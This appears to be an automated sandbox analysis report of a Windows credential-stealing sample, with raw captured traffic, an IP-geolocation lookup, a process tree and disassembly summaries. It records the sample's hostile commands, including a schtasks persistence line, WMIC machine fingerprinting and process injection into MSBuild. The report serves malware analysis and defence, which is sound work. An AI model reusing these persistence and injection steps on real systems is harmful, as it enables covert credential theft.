                            2024-07-27 09:37:20 UTC1369INData Raw: 4f 10 e6 3f 4c 2b 0e 05 90 41 b0 b4 1f 30 95 d1 74 f0 b9 10 66 1a fd 68 e8 37 e2 aa 7e 9c 05 59 8a 06 d5 d0 b9 f6 72 4d 4c ea 97 4c 59 28 6f d9 56 7e 9c b7 c0 14 7f 47 41 7d 4c 7e d1 4c ea 38 eb 1d a0 29 fd 63 22 e5 59 66 a2 df 4c 59 23 4c 7e 9b 6d 5a 3c c3 b5 c2 47 d2 a1 7e 9c dd 4c ae 80 4c 59 ef c9 8a 84 cc 2a bc 3a 4d d6 9a 0d 30 47 d1 77 0b d8 26 15 11 c0 eb 78 c0 a6 f0 02 49 ad 37 b7 22 f6 7c 9e 6b 4c ae 26 ee b9 e4 74 f0 b4 5a 4e 81 f5 b2 ca 91 e5 2f 4c 6c d7 4c ae 7a eb 1d 48 e0 66 e4 17 42 69 f5 b2 25 91 e5 b3 4c 6c 3c 4c ae 05 eb 1d 6c 7a ea d8 21 c6 65 c4 c2 49 d7 c1 60 66 e3 d8 d3 06 fb fd 68 69 b7 30 1e 4c ea ad e4 a1 67 14 01 34 5d bc 06 73 36 9f f5 b2 42 e0 66 42 4c ea ad 4c 59 a3 38 6d a8 fb 78 8a 66 a2 b3 c4 c2 21 df ae 51 a1 06 23 1f 89
                            Data Ascii: O?L+A0tfh7~YrMLLY(oV~GA}L~L8)c"YfLY#L~mZ<G~LLY*:M0Gw&xI7"|kL&tZN/LlLzHfBi%Ll<Llz!eI`fhi0Lg4]s6BfBLLY8mxf!Q#
                            2024-07-27 09:37:20 UTC1369INData Raw: 4c 2b 07 31 77 32 cd 2f a0 d1 65 97 4c 7e 20 36 a2 94 4c 59 d8 4c 2b b5 4c 6c bb 7c 1e 64 4c 59 7f 4c 7e 5c a1 06 7c 4c 59 27 1f 3a 50 10 c5 5b 66 a2 dc 4c 59 a4 2a ba 5c 7b ae 2b 54 50 4e 4c 2b 97 a9 a8 da 48 9b 82 4c 59 86 63 e4 c5 8e 6b be 3a 4d d2 4c 2b d4 c2 17 80 4c ae 6a 4c 59 74 4c 7e 26 10 66 76 4c 59 39 4c 2b 68 66 e3 68 4c ae c7 5e c8 a3 f3 b7 3e 21 c6 0d 4c 59 e1 1a cd 68 4b 18 32 e9 2a 1f 2f 7a 86 7a ea 62 21 c6 d9 15 11 33 d7 c1 41 6e 4d b6 c6 12 61 4c 59 59 fc cc 95 7d 8a 74 54 50 6f b2 55 0e a9 a8 b3 9d bf 3a 7c a8 29 f6 72 1d 4c ea a3 49 ad 28 7e 49 2f a2 65 da 4c ae 67 1f 89 a8 88 cb 41 4c ea 50 97 92 25 8e e8 6e 7e 9c 35 4c ae 15 e0 04 7d f6 72 e9 4c ea 73 4c 59 b8 1a cd c2 4c 6c 4d 4c ae 5c 10 e6 0b 4c 7e 4c e5 b0 bc eb 1d 40 4c 2b 29
                            Data Ascii: L+1w2/eL~ 6LYL+Ll|dLYL~\|LY':P[fLY*\{+TPNL+HLYck:ML+LjLYtL~&fvLY9L+hfhL^>!LYhK2*/zzb!3AnMaLYY}tTPoU:|)rLI(~I/eLgALP%n~5L}rLsLYLlML\L~L@L+)
                            2024-07-27 09:37:20 UTC1369INData Raw: e3 f4 80 54 cd f5 b2 ee 5d 6c d0 4c ea 7e 4c 59 71 38 6d cf 4c 6c d5 ed 0f 39 49 ad 89 91 44 e2 80 36 21 4c 59 4d 4c 2b 64 4b 18 e2 b0 b4 b1 ee b9 97 72 77 46 4c ea 33 10 e6 23 6f d9 9d 0a 59 82 4c ae 69 4c 59 76 4c 7e d4 23 c5 16 6e 38 3b 4c 2b c4 4c 6c 5e 59 8a d5 4c 59 0d 4c 7e 31 4c ea 0e 4d 58 47 4c 2b 2e 4c 6c d6 4c ae 7a ea 1c 91 4c 7e 49 4c ea 93 4c 59 a8 38 6d be e4 60 3d 4c ae 63 4c 59 7f eb 78 e5 4c ea 7b 4c 59 30 4c 2b ca 4c 6c 61 4c ae db 4c 59 07 4c 7e 8b 6b 7e 04 4c 59 48 4c 2b 25 4c 6c e9 bc 9e 34 4c 59 af 4c 7e 43 4c ea 9a cb 6e d8 a3 07 9d 4c 6c 37 4c ae 4a ab 5e 7f f6 72 eb 4c ea 70 4c 59 39 9a 0d c1 4c 6c 4f 4c ae d0 4c 59 08 4c 7e 14 4c ea 0a 4c 59 42 4c 2b f7 31 77 11 cd 2f ee 1a fe a4 4c 7e 75 11 67 fa e1 05 ea 4c 2b 97 4c 6c 44 d3
                            Data Ascii: T]lL~LYq8mLl9ID6!LYML+dKrwFL3#oYLiLYvL~#n8;L+Ll^YLYL~1LMXGL+.LlLzL~ILLY8m`=LcLYxL{LY0L+LlaLLYL~k~LYHL+%Ll4LYL~CLnLl7LJ^rLpLY9LlOLLYL~LLYBL+1w/L~ugL+LlD
                            2024-07-27 09:37:20 UTC1369INData Raw: 9b eb 1d c4 0b 0b 59 ae 9a 23 4c 59 4f 4c 2b 12 4c 6c eb b8 bb 54 99 3e 99 4c 7e 45 4c ea 6b ee b9 f2 3d 0a 4e 1a 48 88 62 a7 21 f3 14 10 3b a8 ff dc 78 b6 cc d8 98 6f d9 c6 4c 6c 69 4c ae 00 3a 4d dc 9e ef 7c 61 84 0c 4c 59 44 4c 2b 69 4b 18 04 5e 3c e5 e0 04 88 63 e4 4b 4c ea 90 4c 59 d4 a3 07 1c 47 d1 88 6b a8 66 cb 6e 58 fc cc 76 1e fb 8d 7b 0e 32 4c 2b c9 4c 6c 04 0b d8 bc 7a 0f ca 16 00 82 97 c0 21 cb 6e b9 ef 19 f4 9c 7d be 18 cb 36 4c 59 ac 4c 7e f4 7b ae f8 7a 0f 77 1f 3a 3a eb e9 34 4c ae 4e 4c 59 16 c9 8a 79 1e fb 4b a7 e0 1d 4c 2b c3 4c 6c 0a 0b d8 d3 4d 58 9d 3b a8 16 4c ea 09 4c 59 71 6f d9 fe fa 79 85 fb fb 39 4c 59 a6 4c 7e 5e 6d 5a 2c d5 d0 78 1f 3a 94 4c 6c 3a 4c ae 03 eb 1d 6b 7b eb 37 09 9c 5d 4c 59 17 4c 2b dc 7e 9c a9 a5 60 63 b7 f2
                            Data Ascii: Y#LYOL+LlT>L~ELk=NHb!;xoLliL:M|aLYDL+iK^<cKLLYGkfnXv{2L+Llz!n}6LYL~{zw::4LNLYyKL+LlMX;LLYqoy9LYL~^mZ,x:Ll:Lk{7]LYL+~`c
                            2024-07-27 09:37:20 UTC1369INData Raw: f6 72 8a 50 24 9e cb 6e d6 9a 0d 9b bd 5f 12 9d bf 1d 7b 0e 77 4c 7e ef 4c ea 32 eb 1d cc 68 bf 48 47 d1 54 50 84 29 c1 b6 fc fc cc 21 1e fb 59 7b 0e 46 4c 2b 2f 4c 6c 90 0b d8 e8 7a 0f 81 9e ef 75 c7 53 92 4c 59 ee 4c 2b d7 4b 18 2d 9d bf 53 fd 68 78 4c 7e e4 4c ea 1d eb 1d 30 4d 2a 8a 0d 2f 60 4c ae da 4c 59 36 3d 4e 2b 4b df 47 0f 1a 49 4c 2b 24 4c 6c 2a 7c 1e ff d5 d0 b7 44 53 42 4c ea ad 4c 59 a3 38 6d a9 fa 79 75 0d ef 4d 4c 59 72 4c 7e 09 6d 5a bf 10 e6 73 f5 61 25 99 8b e4 e4 21 d1 4c 59 09 4c 7e 97 8d 68 34 f5 b2 56 cb dc 2a 4c 6c d2 4c ae 5f eb 1d 73 59 98 51 26 72 9b d1 65 eb 4c 2b 55 ce af 97 c0 14 72 5b bc 5d 4c 7e e1 4c ea 18 eb 1d ae 47 d2 57 74 71 45 4c ae ef 4c 59 b7 c9 8a 16 76 e3 24 3a 4d 86 63 85 75 78 fb c3 b0 b4 cc e1 05 3e 7b eb 8e
                            Data Ascii: rP$n_{wL~L2hHGTP)!Y{FL+/LlzuSLYL+K-ShxL~L0M*/`LLY6=N+KGIL+$Ll*|DSBLLY8myuMLYrL~mZsa%!LYL~h4V*LlL_sYQ&reL+Ur[]L~LGWtqELLYv$:Mcux>{
                            2024-07-27 09:37:20 UTC1369INData Raw: 24 1f 74 32 f9 cc a9 46 8d ed 74 73 36 d6 4c 59 0e 4c 7e 3e 21 c6 df 5e c8 28 e3 46 2c 4c 6c d4 4c ae 79 eb 1d 13 8c ff 7a 6d 5a 91 4c 59 ed 4c 2b 44 1a 48 2f 9d bf 2c 92 26 7a 4c 7e e6 4c ea 1f eb 1d 22 1f 3a 0b cd ad 62 4c ae d9 4c 59 41 c9 8a 0c 1e fb aa 51 a4 4b 4c 2b 26 4c 6c ad 0b d8 36 4d 58 90 72 77 41 4c ea af 4c 59 04 6f d9 ab fa 79 3c 62 a7 4f 4c 59 71 4c 7e 0b 6d 5a ba d5 d0 49 e9 7c c2 4c 6c 4d 4c ae a4 eb 1d dc 7b eb 1e 76 e3 08 4c 59 40 4c 2b 89 7e 9c c4 b8 bb 1d a9 5c a7 4c 7e bf 4c ea 44 ee b9 d9 3d 0a 41 1a 48 36 62 a7 f5 6e 38 78 eb 78 62 cf 28 ec ee b9 16 4c 2b 7d 4c 6c 53 59 8a 7d 5e c8 4e b7 30 18 4c ea 02 4c 59 fa 38 6d 30 5f bf b5 14 c1 29 c4 c2 a8 4c 7e b4 4c ea 92 d1 65 4f d1 a6 9c 2b 6b 36 6b a8 b9 2f 7a 45 9e ef 99 28 3c 56 4c
                            Data Ascii: $t2Fts6LYL~>!^(F,LlLyzmZLYL+DH/,&zL~L":bLLYAQKL+&Ll6MXrwALLYoy<bOLYqL~mZI|LlML{vLY@L+~\L~LD=AH6bn8xxb(L+}LlSY}^N0LLY8m0_)L~LeO+k6k/zE(<VL
                            2024-07-27 09:37:20 UTC1369INData Raw: d0 eb 7e 01 31 77 fa 66 a2 3f 4c 59 53 cf bc 77 c4 50 46 5b bc ef 4c 2b b2 4c 6c 79 0b d8 c8 f5 b2 26 22 a7 e5 4c ea 7b 4c 59 54 38 6d 17 71 37 5b 50 84 db 4c 59 07 4c 7e bb 5a 4e 3e f5 b2 f9 ac 58 25 4c 6c d9 4c ae 70 eb 1d af 4c 7e 43 4c ea ac 4c 59 5a 63 85 cd dd 3c 26 9d bf 2e bc 29 73 4c 7e eb 4c ea 16 eb 1d 21 26 31 43 8e ef a4 a5 60 52 ce da 71 66 23 4e e5 b0 8e 49 ad 42 4c 2b 2b 4c 6c d3 4c ae 65 84 82 c2 3b a8 bc 4c ea a6 4c 59 8d 38 6d 8c 31 77 02 a5 60 a9 10 e6 b6 74 f0 6e a1 06 0d 1f 89 04 1f 3a 32 c2 17 44 4c ae ee 4c 59 b6 c9 8a a5 c4 50 0d d1 65 bd 4c 2b 20 4c 6c d1 62 a7 2b c4 c2 1d 19 d8 93 4b df 26 d6 d3 e1 4c 2b 98 4c 6c 92 7c 1e 68 fd 68 c2 9b 5a e3 76 e3 74 fd 68 1c 9a 0d 1d c2 17 96 b3 b6 64 cc d8 1d 3d 4e 11 4c ea fd 4c 59 63 29 fd
                            Data Ascii: ~1wf?LYSwPF[L+Lly&"L{LYT8mq7[PLYL~ZN>X%LlLpL~CLLYZc<&.)sL~L!&1C`Rqf#NIBL++LlLe;LLY8m1w`tn:2DLLYPeL+ Llb+K&L+Ll|hhZvthd=NLLYc)
                            2024-07-27 09:37:20 UTC1369INData Raw: d6 41 3f 4c ae 60 4c 59 1c c9 8a c2 4b df f9 8c 98 32 4c 2b c9 4c 6c c3 7c 1e 72 10 e6 d0 19 d8 4a aa bc a8 52 a7 4a 4c 2b 27 4c 6c 1a ce 2c 9d f5 b2 49 fa 6b 40 4c ea ae 4c 59 a1 38 6d 50 42 97 19 b7 b3 4e 4c 59 70 4c 7e 8e 7b ae 7b 54 50 89 29 fd 4c 66 e3 82 80 54 c9 c4 c2 5e b8 2a 23 4b df 4c 89 2c 41 4c 2b 28 4c 6c 22 7c 1e 88 fd 68 b2 9b 5a 43 76 e3 94 fd 68 ef 9a 0d ee c2 17 1a bc 9e 84 cc d8 ee 3d 4e e2 4c ea 5d 4c 59 83 29 fd 6d 9c 7d 2b 27 e3 ed 4c 59 01 4c 7e 6d 7b ae 28 25 62 25 41 b4 fa 31 77 ee 4c ae 33 4c 59 91 f6 72 38 50 24 ac cb 6e e4 9a 0d a9 bd 5f 20 9d bf 2e 7b 0e 55 4c 7e cd 4c ea 10 eb 1d 7f 68 bf 67 9c 7d 14 32 77 e7 4c 59 fd 4c 7e 67 7b ae ee 5e c8 15 2c 9a 0d 4c 6c e5 4c ae 58 eb 1d a2 4d 7f fe 99 8f a0 4c 59 cc 4c 2b 61 7e 9c 2a
                            Data Ascii: A?L`LYK2L+Ll|rJRJL+'Ll,Ik@LLY8mPBNLYpL~{{TP)LfT^*#KL,AL+(Ll"|hZCvh=NL]LY)m}+'LYL~m{(%b%A1wL3LYr8P$n_ .{UL~Lhg}2wLYL~g{^,LlLXMLYL+a~*


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.94971234.117.59.814431272C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            TimestampBytes transferredDirectionData
                            2024-07-27 09:37:22 UTC63OUTGET /json HTTP/1.1
                            Host: ipinfo.io
                            Connection: Keep-Alive
                            2024-07-27 09:37:23 UTC345INHTTP/1.1 200 OK
                            access-control-allow-origin: *
                            Content-Length: 319
                            content-type: application/json; charset=utf-8
                            date: Sat, 27 Jul 2024 09:37:23 GMT
                            x-content-type-options: nosniff
                            via: 1.1 google
                            strict-transport-security: max-age=2592000; includeSubDomains
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close
                            2024-07-27 09:37:23 UTC319INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22
                            Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:05:37:11
                            Start date:27/07/2024
                            Path:C:\Users\user\Desktop\Mu7iyblZk8.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\Mu7iyblZk8.exe"
                            Imagebase:0x990000
                            File size:79'872 bytes
                            MD5 hash:74F11A170C0A518CE076AE43F70A7C06
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:3
                            Start time:05:37:15
                            Start date:27/07/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            Imagebase:0x4a0000
                            File size:262'432 bytes
                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:4
                            Start time:05:37:15
                            Start date:27/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"cmd.exe" /c schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f
                            Imagebase:0x7ff6b8e00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:05:37:15
                            Start date:27/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:6
                            Start time:05:37:15
                            Start date:27/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f
                            Imagebase:0x7ff763430000
                            File size:235'008 bytes
                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:7
                            Start time:05:37:16
                            Start date:27/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:8
                            Start time:05:37:17
                            Start date:27/07/2024
                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                            Wow64 process (32bit):true
                            Commandline:"wmic" csproduct get UUID
                            Imagebase:0xfc0000
                            File size:427'008 bytes
                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:9
                            Start time:05:37:17
                            Start date:27/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:10
                            Start time:05:37:17
                            Start date:27/07/2024
                            Path:C:\Users\user\AppData\Roaming\WareHouse.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\AppData\Roaming\WareHouse.exe
                            Imagebase:0xa50000
                            File size:79'872 bytes
                            MD5 hash:74F11A170C0A518CE076AE43F70A7C06
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 37%, ReversingLabs
                            • Detection: 24%, Virustotal, Browse
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:11
                            Start time:05:37:21
                            Start date:27/07/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            Imagebase:0xa40000
                            File size:262'432 bytes
                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3813836224.0000000000423000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:12
                            Start time:05:37:22
                            Start date:27/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:13
                            Start time:05:37:23
                            Start date:27/07/2024
                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                            Wow64 process (32bit):true
                            Commandline:"wmic" csproduct get UUID
                            Imagebase:0xfc0000
                            File size:427'008 bytes
                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:14
                            Start time:05:37:23
                            Start date:27/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:24.8%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:11.1%
                              Total number of Nodes:27
                              Total number of Limit Nodes:0

                              Executed Functions

                              Function 00007FF886E1166F Relevance: 1.7, APIs: 1, Instructions: 196filenetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 101 7ff886e1166f-7ff886e11715 104 7ff886e1173e-7ff886e117cb InternetReadFile 101->104 105 7ff886e11717-7ff886e1173b 101->105 106 7ff886e117cd 104->106 107 7ff886e117d3-7ff886e11833 104->107 105->104 106->107
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: FileInternetRead
                              • String ID:
                              • API String ID: 778332206-0
                              • Opcode ID: 3886dd087334cc2ae9e2352b8b53b5f6efabdedb2f79e5b7834deee4273abc6b
                              • Instruction ID: 70055b8bb701cf57ef533e59578262dc057120a75803053d826013e4aadd5198
                              • Opcode Fuzzy Hash: 3886dd087334cc2ae9e2352b8b53b5f6efabdedb2f79e5b7834deee4273abc6b
                              • Instruction Fuzzy Hash: 15510670918A1C8FDB58DF98C889BE9BBF0FB69311F1041AED449A3251DB70A985CF81
                              Function 00007FF886E1579F Relevance: 2.0, APIs: 1, Instructions: 501processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: e39d512da5c669d1782c63fae5b159645cc2d92221c4a3e2bc130d0b6aa25420
                              • Instruction ID: f18f4ed920f184ba9a8e68c466f76f35d6e3e165d1c7491aca92a5081cb7a6aa
                              • Opcode Fuzzy Hash: e39d512da5c669d1782c63fae5b159645cc2d92221c4a3e2bc130d0b6aa25420
                              • Instruction Fuzzy Hash: C4F16070918A8D8FDBB8DF18C895BF977E1FB59351F10412AD80ECB291DB74AA44CB81
                              Function 00007FF886E1140D Relevance: 1.7, APIs: 1, Instructions: 247networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              • Opcode ID: 2e6c87f4d74d42236021fa64dd96554c8f30964d3e2c79dd9c50b523591e71ae
                              • Instruction ID: 482b0afffbfc9c321a5df607403bb44a70531f5af2876e2cd837cdb9e37c1959
                              • Opcode Fuzzy Hash: 2e6c87f4d74d42236021fa64dd96554c8f30964d3e2c79dd9c50b523591e71ae
                              • Instruction Fuzzy Hash: 3E712470908A5C8FDB98EF58C894BE9BBF1FB69311F1001AED00EE3651DB75A980CB41
                              Function 00007FF886E111DF Relevance: 1.7, APIs: 1, Instructions: 242networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              • Opcode ID: 9fc28fb10e32150d2af40d77592148ef6b2a4442857c5f4f3f1fd7ddc226e354
                              • Instruction ID: 880b0e9b41a2214c14462cd7692e1ba86eeed2145b2704a57d3018e20466b7ef
                              • Opcode Fuzzy Hash: 9fc28fb10e32150d2af40d77592148ef6b2a4442857c5f4f3f1fd7ddc226e354
                              • Instruction Fuzzy Hash: F571F070908A1D8FDB98EF58C858BE9BBF1FB69311F1041AED00EE3651DB75A981CB41
                              Function 00007FF886E16291 Relevance: 1.7, APIs: 1, Instructions: 221injectionCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: cc739809153f4042353ac43dad5a2707347c4223baa5fbeab3e6c05e324b266c
                              • Instruction ID: ca484339e9306912b3283ec48e327a5845af54aa5c6d972d9cf3ab4e31d9e7fc
                              • Opcode Fuzzy Hash: cc739809153f4042353ac43dad5a2707347c4223baa5fbeab3e6c05e324b266c
                              • Instruction Fuzzy Hash: 91612770D08A1D8FDB94DF58C885BE9BBF1FB69311F1082AAD04CE3251CB74A985CB40
                              Function 00007FF886E160C5 Relevance: 1.7, APIs: 1, Instructions: 201memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 90 7ff886e160c5-7ff886e160d1 91 7ff886e160dc-7ff886e16219 VirtualAllocEx 90->91 92 7ff886e160d3-7ff886e160db 90->92 97 7ff886e1621b 91->97 98 7ff886e16221-7ff886e1628d 91->98 92->91 97->98
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: c2281a795387c9d26f76a08a75cae996b7c5c4b72f4c2499573b8b22251ab891
                              • Instruction ID: ff3a2d925ab0c0e2a5945c3e9989a4262fbb6ed3c451136da2d5e813c55f2b8c
                              • Opcode Fuzzy Hash: c2281a795387c9d26f76a08a75cae996b7c5c4b72f4c2499573b8b22251ab891
                              • Instruction Fuzzy Hash: C1513970908A1C8FDF94EF58C845BE9BBF0FB6A310F1041AAD04CE3251CB75A985CB81
                              Function 00007FF886E1649D Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 110 7ff886e1649d-7ff886e164a9 111 7ff886e164ab-7ff886e164b3 110->111 112 7ff886e164b4-7ff886e165ef ReadProcessMemory 110->112 111->112 117 7ff886e165f1 112->117 118 7ff886e165f7-7ff886e16659 112->118 117->118
                              APIs
                              Memory Dump Source
